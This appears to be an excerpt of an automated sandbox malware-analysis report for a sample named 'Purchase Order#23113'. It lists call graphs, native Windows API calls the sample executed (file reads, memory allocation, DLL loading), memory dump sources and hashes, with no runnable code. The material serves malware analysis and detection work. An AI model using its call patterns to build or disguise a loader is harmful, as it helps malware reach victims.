98910 419bda 98909->98910 98910->98863 98912 41bdc0 2 API calls 98911->98912 98913 419c39 98912->98913 98913->98863 98915 40829f 98914->98915 98916 4081b5 98914->98916 98915->98865 98916->98915 98917 414a50 8 API calls 98916->98917 98918 408222 98917->98918 98919 41bdc0 2 API calls 98918->98919 98920 408249 98918->98920 98919->98920 98920->98865 98922 409335 98921->98922 98923 40acf0 LdrLoadDll 98922->98923 98924 409368 98923->98924 98925 40938d 98924->98925 98930 40cf20 98924->98930 98925->98897 98951 41a580 98927->98951 98931 40cf4c 98930->98931 98932 41a1e0 LdrLoadDll 98931->98932 98933 40cf65 98932->98933 98934 40cf6c 98933->98934 98941 41a220 98933->98941 98934->98925 98936 40cf8f 98936->98934 98948 41a810 LdrLoadDll 98936->98948 98938 40cfa7 98939 41a490 2 API calls 98938->98939 98940 40cfca 98939->98940 98940->98925 98942 41af60 LdrLoadDll 98941->98942 98943 41a23c 98941->98943 98942->98943 98949 1772ca0 LdrInitializeThunk 98943->98949 98944 41a257 98944->98936 98950 1772ea0 LdrInitializeThunk 98944->98950 98945 41a29b 98945->98936 98948->98938 98949->98944 98950->98945 98952 41a596 98951->98952 98953 41af60 LdrLoadDll 98952->98953 98954 41a59c 98953->98954 98957 1772f90 LdrInitializeThunk 98954->98957 98955 419bc9 98955->98908 98955->98911 98957->98955 98959 408328 98958->98959 98960 40acf0 LdrLoadDll 98959->98960 98961 408343 98960->98961 98962 414e50 LdrLoadDll 98961->98962 98963 408353 98962->98963 98964 40835c PostThreadMessageW 98963->98964 98965 408370 98963->98965 98964->98965 98965->98880 98967 40f683 98966->98967 98973 419e90 98967->98973 98971 419d6c 98970->98971 98972 41af60 LdrLoadDll 98970->98972 98971->98889 98972->98971 98974 419eac 98973->98974 98975 41af60 LdrLoadDll 98973->98975 98978 1772dd0 LdrInitializeThunk 98974->98978 98975->98974 98976 40f6ae 98976->98880 98978->98976 98979->98812 98981 41af60 LdrLoadDll 98980->98981 98982 419fdc 98981->98982 98985 1772f30 LdrInitializeThunk 98982->98985 98983 40f4fe 98983->98818 98983->98819 98985->98983 98986->98824 98987->98829 98988->98834 98992 1772ad0 LdrInitializeThunk

                                                                            Executed Functions

                                                                            Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 41a410-41a426 1 41a42c-41a459 NtReadFile 0->1 2 41a427 call 41af60 0->2 2->1
                                                                            APIs
                                                                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID: 1JA$rMA$rMA
                                                                            • API String ID: 2738559852-782607585
                                                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                            • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                            • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041A40B Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34filenativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 3 41a40b-41a459 call 41af60 NtReadFile
                                                                            APIs
                                                                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID: 1JA$rMA$rMA
                                                                            • API String ID: 2738559852-782607585
                                                                            • Opcode ID: 40296086b2c65b8e1281a00ba7c399c1232ea7f1d97edca416a916e4757591c9
                                                                            • Instruction ID: 9b28a46ab4fa2a32d5bfb7c5fd36816b9b2bf06c9a4a590c0aa8104f95e36be6
                                                                            • Opcode Fuzzy Hash: 40296086b2c65b8e1281a00ba7c399c1232ea7f1d97edca416a916e4757591c9
                                                                            • Instruction Fuzzy Hash: 9BF01DB2114049AFCB04DF99D880CEBB7ADEF8C218B15864DF95C97201C630E855CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041A53A Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 204 41a53a-41a53b 205 41a501-41a539 call 41af60 call 1772e80 204->205 206 41a53d-41a53f 204->206 208 41a541-41a556 206->208 209 41a596-41a5b9 call 41af60 call 1772f90 206->209 211 41a55c-41a57d NtAllocateVirtualMemory 208->211 212 41a557 call 41af60 208->212 212->211
                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: 3abcdc1be25a100d8e90c82018335ced6614c48c47a8e34b9972859f4df0c279
                                                                            • Instruction ID: 21f0199be098d254c0e1f8a28cd9adb607e2c9389512d22ae25e752f30171257
                                                                            • Opcode Fuzzy Hash: 3abcdc1be25a100d8e90c82018335ced6614c48c47a8e34b9972859f4df0c279
                                                                            • Instruction Fuzzy Hash: 312147B2200208AFCB18DF88DC85EEB77ADEF8C754F148519BE0897241C634E861CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 249 40acf0-40ad19 call 41cc50 252 40ad1b-40ad1e 249->252 253 40ad1f-40ad2d call 41d070 249->253 256 40ad3d-40ad4e call 41b4a0 253->256 257 40ad2f-40ad3a call 41d2f0 253->257 262 40ad50-40ad64 LdrLoadDll 256->262 263 40ad67-40ad6a 256->263 257->256 262->263
                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                            • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                                                            • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                            • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 264 41a360-41a376 265 41a37c-41a3b1 NtCreateFile 264->265 266 41a377 call 41af60 264->266 266->265
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                            • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                            • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041A35C Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 267 41a35c-41a3b1 call 41af60 NtCreateFile
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: f9fb42313e651b9959a468de8585fd26e5716500142227deabab1e432ae5e1e9
                                                                            • Instruction ID: db03205a086da1a1d13bd787de8e7eaf85e719fb6bd48b883609cf1232bc0a34
                                                                            • Opcode Fuzzy Hash: f9fb42313e651b9959a468de8585fd26e5716500142227deabab1e432ae5e1e9
                                                                            • Instruction Fuzzy Hash: BAF014B2214148ABCB08DF98D884CEB77A9FF8C354B14864DFA0D93206D630E8518BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 270 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                            • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                            • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order#23113.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                            • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                            • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01772B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 396bfddb25253d986651ae32bafe6ac3a371b2c8b5c43506b0cb7fd7caf7247c
                                                                            • Instruction ID: 2c70833671dfb32b01ea2dfc702273ee7d3842cf8d6637c7090005d255ad0981
                                                                            • Opcode Fuzzy Hash: 396bfddb25253d986651ae32bafe6ac3a371b2c8b5c43506b0cb7fd7caf7247c
                                                                            • Instruction Fuzzy Hash: 3690026124640003420571584454616D00B97E0311B95C031E10145A4DC5258A916227
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01772BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: d8a66048e9c391a66bd10ceab5a8f58e33cff2ef9a93279d211838d1a4d080d7
                                                                            • Instruction ID: 91412e0fda296685bb1fc36c86e5c536554b671e8f563ff4c811ef9e53efbe16
                                                                            • Opcode Fuzzy Hash: d8a66048e9c391a66bd10ceab5a8f58e33cff2ef9a93279d211838d1a4d080d7
                                                                            • Instruction Fuzzy Hash: C690023124540802D2807158444464A900697D1311FD5C025A0025668DCA158B5977A3
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01772AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 51238a52142d8c15612beecb55ea2a5f5a7de9945ee7f18fe95792009999552a
                                                                            • Instruction ID: 3bbd98b065d8e22d0749feab80d5b128bc7daa9d252b10f45c392ce22fb57ed3
                                                                            • Opcode Fuzzy Hash: 51238a52142d8c15612beecb55ea2a5f5a7de9945ee7f18fe95792009999552a
                                                                            • Instruction Fuzzy Hash: E5900225255400030205B5580744507904797D5361395C031F1015564CD6218A615223
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01772D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: aaf3f8af700ab66986b87e523b671bfb463ead58e01bdf3eaeba5e270758f9f9
                                                                            • Instruction ID: cfc890f7cfb70608f12ff3260a8318285921689dd5ca4cafb6ceed54d533b7e0
                                                                            • Opcode Fuzzy Hash: aaf3f8af700ab66986b87e523b671bfb463ead58e01bdf3eaeba5e270758f9f9
                                                                            • Instruction Fuzzy Hash: 0490022134540003D24071585458606D006E7E1311F95D021E0414568CD9158A565323
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01772D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 8558c0b4a1f31fa05be07ce3a308f3cafe6c48fd5169b3f64408c72ea9ef2ca4
                                                                            • Instruction ID: 2c9a8ffa1f23543fc99ca518f165b0268d5933adf957443630b4b3f70c65c5e4
                                                                            • Opcode Fuzzy Hash: 8558c0b4a1f31fa05be07ce3a308f3cafe6c48fd5169b3f64408c72ea9ef2ca4
                                                                            • Instruction Fuzzy Hash: E290022925740002D2807158544860A900697D1312FD5D425A001556CCC9158A695323
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01772DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: b193527e9468e670cb44923f9c399192d5137fc3122ef71f52995c4493c84017
                                                                            • Instruction ID: 82cb42a798e53888c0339abc77963482317e4098285361a47779c40605a01015
                                                                            • Opcode Fuzzy Hash: b193527e9468e670cb44923f9c399192d5137fc3122ef71f52995c4493c84017
                                                                            • Instruction Fuzzy Hash: 0790023124540413D21171584544707900A97D0351FD5C422A042456CDD6568B52A223
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01772DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 2a74d5bceb426f6a0c6867d72e0761d63ac7ba85d4f8ca8f1a50c135f08d4cc3
                                                                            • Instruction ID: a6b82c05084c6d8991804708b4650bc275708a27f93c7fea7c88d21539c8afd4
                                                                            • Opcode Fuzzy Hash: 2a74d5bceb426f6a0c6867d72e0761d63ac7ba85d4f8ca8f1a50c135f08d4cc3
                                                                            • Instruction Fuzzy Hash: DA900221286441525645B1584444507D007A7E03517D5C022A1414964CC5269A56D723
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01772C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 6b09422b77843be93d90fde2e7f2f21ffe16d89e165e36b12cbf1da45280f757
                                                                            • Instruction ID: fabb5ec443e4d2e96ba3d2c2f1dc189f7c6b497415f299f06ccb8b611d5b8580
                                                                            • Opcode Fuzzy Hash: 6b09422b77843be93d90fde2e7f2f21ffe16d89e165e36b12cbf1da45280f757
                                                                            • Instruction Fuzzy Hash: 7490023124548802D2107158844474A900697D0311F99C421A442466CDC6958A917223
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01772CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 8d33d551dab5b5608956e754c6914bd0b26bb27f4a3cbd0c39b585377309ad28
                                                                            • Instruction ID: a30f4da58c5f1e382c38b566566a2b3b9a4b4e903c35b5a1ad3a9f2490a09d54
                                                                            • Opcode Fuzzy Hash: 8d33d551dab5b5608956e754c6914bd0b26bb27f4a3cbd0c39b585377309ad28
                                                                            • Instruction Fuzzy Hash: C790023124540402D20075985448646900697E0311F95D021A5024569EC6658A916233
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01772F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 2efe3d57974e3abe87b64d55184543f038f77b55c948cee49f4a3a4e0ca21f87
                                                                            • Instruction ID: 130e85c4c11567069a3b5a12470e1cee140a23c8c172d125789132c4575198cb
                                                                            • Opcode Fuzzy Hash: 2efe3d57974e3abe87b64d55184543f038f77b55c948cee49f4a3a4e0ca21f87
                                                                            • Instruction Fuzzy Hash: 1490026138540442D20071584454B069006D7E1311F95C025E1064568DC619CE526227
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01772FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 9f82a70a61b51a10fed78d26a23ffb3da85406327e8cbf4785742e9e54ac8baa
                                                                            • Instruction ID: 6fe7dafe112fc98b18d8d29f9cee0c81dfbd86f836aa85971e0fa6383a2ab598
                                                                            • Opcode Fuzzy Hash: 9f82a70a61b51a10fed78d26a23ffb3da85406327e8cbf4785742e9e54ac8baa
                                                                            • Instruction Fuzzy Hash: 59900221255C0042D30075684C54B07900697D0313F95C125A0154568CC9158A615623
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01772FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 6285ec385f4a62ed2c1e93decb9244d8c3d10062acf1f7cc1d21d836135f4447
                                                                            • Instruction ID: 3d00b13fded829c37b35e1f30c0c665abec71597ba51ef4ba4ae7f9e54495cf8
                                                                            • Opcode Fuzzy Hash: 6285ec385f4a62ed2c1e93decb9244d8c3d10062acf1f7cc1d21d836135f4447
                                                                            • Instruction Fuzzy Hash: 1A90022164540042424071688884906D006BBE1321795C131A0998564DC5598A655767
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01772F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: bfe25dd3423106ef0930ff59cad57f404f62589674f1e15408486e5dcb8dd01a
                                                                            • Instruction ID: aa5436d969fe4209d08492fb811868e5e14ea68b957f0bc121af4c2f71493608
                                                                            • Opcode Fuzzy Hash: bfe25dd3423106ef0930ff59cad57f404f62589674f1e15408486e5dcb8dd01a
                                                                            • Instruction Fuzzy Hash: 6690023124580402D2007158485470B900697D0312F95C021A1164569DC6258A516673
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01772EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: a8f17a4d20f9f1908375e136cc029fca68c3f1f1588b1b476751d829302815a5
                                                                            • Instruction ID: abd499cf8fea3059bbfa288c52d492a0c79e31b2da894dca13e492144c54cfd6
                                                                            • Opcode Fuzzy Hash: a8f17a4d20f9f1908375e136cc029fca68c3f1f1588b1b476751d829302815a5
                                                                            • Instruction Fuzzy Hash: 9D90027124540402D24071584444746900697D0311F95C021A5064568EC6598FD56767
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01772E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_1700000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
